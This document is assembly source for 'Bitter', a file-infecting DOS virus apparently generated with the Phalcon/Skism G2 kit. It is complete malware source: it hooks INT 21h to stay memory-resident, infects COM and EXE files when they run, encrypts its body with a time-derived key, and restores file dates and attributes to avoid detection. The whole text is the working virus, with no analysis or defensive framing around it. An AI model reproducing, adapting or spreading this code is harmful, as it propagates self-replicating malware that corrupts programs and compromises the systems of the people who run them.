; Virus generated by Gý 0.70á ; Gý written by Dark Angel of Phalcon/Skism ; File: BITTER.ASM ; Bitter by Ender checkres1 = 'DA' checkres2 = 'PS' id = 'EF' .model tiny .code ; Assemble with: ; TASM /m3 filename.ASM ; TLINK filename.OBJ ; EXE2BIN filename.EXE filename.COM org 0000h start: ENCRYPT: patchstart: mov bx, offset endencrypt mov cx, (heap-endencrypt)/2+1 encrypt_loop: db 002Eh ; cs: db 0081h ; add word ptr [bx], xxxx xorpatch db 0007h encryptvalue dw 0000h inc bx inc bx loop encrypt_loop endencrypt: call next next: pop bp sub bp, offset next push es push ds mov ax, checkres1 ; Installation check int 0021h cmp ax, checkres2 ; Already installed? jz done_install mov ax, ds dec ax mov ds, ax sub word ptr ds:[0003h], ((endheap-start+1023)/1024)*64 sub word ptr ds:[0012h], ((endheap-start+1023)/1024)*64 mov es, word ptr ds:[0012h] push cs pop ds xor di, di mov cx, (heap-start)/2+1 ; Bytes to move mov si, bp ; lea si,[bp+offset start] rep movsw xor ax, ax mov ds, ax sub word ptr ds:[0413h], (endheap-start+1023)/1024 push ds lds ax, ds:[21h*4] ; Get old int handler mov word ptr es:oldint21, ax mov word ptr es:oldint21+2, ds pop ds mov word ptr ds:[21h*4], offset int21 ; Replace with new handler mov ds:[21h*4+2], es ; in high memory done_install: pop ds pop es cmp sp, id je restore_EXE restore_COM: mov di, 0100h push di lea si, [bp+offset old3] movsw movsb ret restore_EXE: mov ax, ds add ax, 0010h add cs:[bp+word ptr origCSIP+2], ax add ax, cs:[bp+word ptr origSPSS] cli mov ss, ax mov sp, cs:[bp+word ptr origSPSS+2] sti db 00EAh origCSIP db ? old3 db 0cdh,20h,0 origSPSS dd ? INT24: mov al, 0003h iret int21: push ax push bx push cx push dx push si push di push ds push es cmp ax, 4B00h ; execute? jz execute return: jmp exitint21 execute: mov word ptr cs:filename, dx mov word ptr cs:filename+2, ds mov ax, 3524h int 0021h push es push bx mov ax, 2524h lea dx, INT24 ; ASSumes ds=cs int 0021h push cs pop es mov bx, dx cmp word ptr [bx+3], 'AM' ; Check if COMMAND.COM jz return ; Exit if so mov ax, 4300h lds dx, cs:filename int 0021h jc return push cx push ds push dx mov ax, 4301h ; clear file attributes push ax ; save for later use xor cx, cx int 0021h lds dx, cs:filename mov ax, 3D02h int 0021h mov bx, ax ; xchg ax,bx is more efficient push cs pop ds mov ax, 5700h ; get file time/date int 0021h push cx push dx mov ah, 003Fh mov dx, offset readbuffer mov cx, 001Ah int 0021h mov ax, 4202h xor cx, cx cwd int 0021h cmp word ptr [offset readbuffer], 'ZM' jz checkEXE mov cx, word ptr [offset readbuffer+1] ; jmp location add cx, heap-start+3 ; convert to filesize cmp ax, cx ; equal if already infected jz jmp_close cmp ax, 65535-(endheap-start) ; check if too large ja jmp_close ; Exit if so cmp ax, (heap-start) ; check if too small jb jmp_close ; Exit if so mov di, offset old3 mov si, offset readbuffer movsw movsb mov si, ax ; save entry point add si, 0100h mov cx, 0003h sub ax, cx mov word ptr [offset readbuffer+1], ax mov dl, 00E9h mov byte ptr [offset readbuffer], dl jmp short continue_infect checkEXE: cmp word ptr [offset readbuffer+10h], id jnz skipp jmp_close: jmp close skipp: lea si, readbuffer+14h lea di, origCSIP movsw ; Save original CS and IP movsw sub si, 000Ah movsw ; Save original SS and SP movsw push bx ; save file handle mov bx, word ptr [readbuffer+8] ; Header size in paragraphs mov cl, 0004h shl bx, cl push dx ; Save file size on the push ax ; stack sub ax, bx ; File size - Header size sbb dx, 0000h ; DX:AX - BX -> DX:AX mov cx, 0010h div cx ; DX:AX/CX = AX Remainder DX mov word ptr [readbuffer+0Eh], ax ; Para disp stack segment mov word ptr [readbuffer+16h], ax ; Para disp CS in module. mov word ptr [readbuffer+10h], id ; Initial SP mov word ptr [readbuffer+14h], dx ; IP Offset mov si, dx ; save entry point pop ax ; Filelength in DX:AX pop dx add ax, heap-start adc dx, 0000h mov cl, 0009h push ax shr ax, cl ror dx, cl stc adc dx, ax pop ax and ah, 0001h mov word ptr [readbuffer+2], ax ; the EXE header. mov word ptr [readbuffer+4], dx ; Fix-up the file size in pop bx ; restore file handle mov cx, 001Ah continue_infect: push cx ; save # bytes to write get_encrypt_value: mov ah, 002Ch ; Get current time int 0021h or dx, dx ; Check if encryption value = 0 jz get_encrypt_value ; Get another if it is add si, (offset endencrypt-offset encrypt) mov word ptr ds:[patchstart+1], si mov word ptr ds:[encryptvalue], dx mov di, offset encryptbuffer mov si, offset ENCRYPT mov cx, (heap-encrypt)/2 push si rep movsw ; copy virus to buffer mov ax, offset endencrypt-encrypt+encryptbuffer mov word ptr ds:[patchstart+1], ax pop si push offset endencrypt mov byte ptr [offset endencrypt], 00C3h ; retn xor byte ptr [offset xorpatch-encrypt+encryptbuffer], 0028h push bx call si ; encrypt virus in buffer pop bx pop word ptr [offset endencrypt] xor byte ptr [offset xorpatch], 0028h mov ah, 0040h mov cx, heap-encrypt mov dx, offset encryptbuffer int 0021h mov ax, 4200h xor cx, cx cwd int 0021h pop cx mov ah, 0040h mov dx, offset readbuffer int 0021h close: mov ax, 5701h ; restore file time/date pop dx pop cx int 0021h mov ah, 003Eh int 0021h pop ax ; restore file attributes pop dx ; get filename and pop ds pop cx ; attributes from stack int 0021h pop dx pop ds mov ax, 2524h int 0021h exitint21: pop es pop ds pop di pop si pop dx pop cx pop bx pop ax db 00EAh ; return to original handler oldint21 dd ? virusname db 'I am quite BITTER!',0 heap: encryptbuffer db (heap-encrypt)+1 dup (?) filename dd ? readbuffer db 1ah dup (?) endheap: end start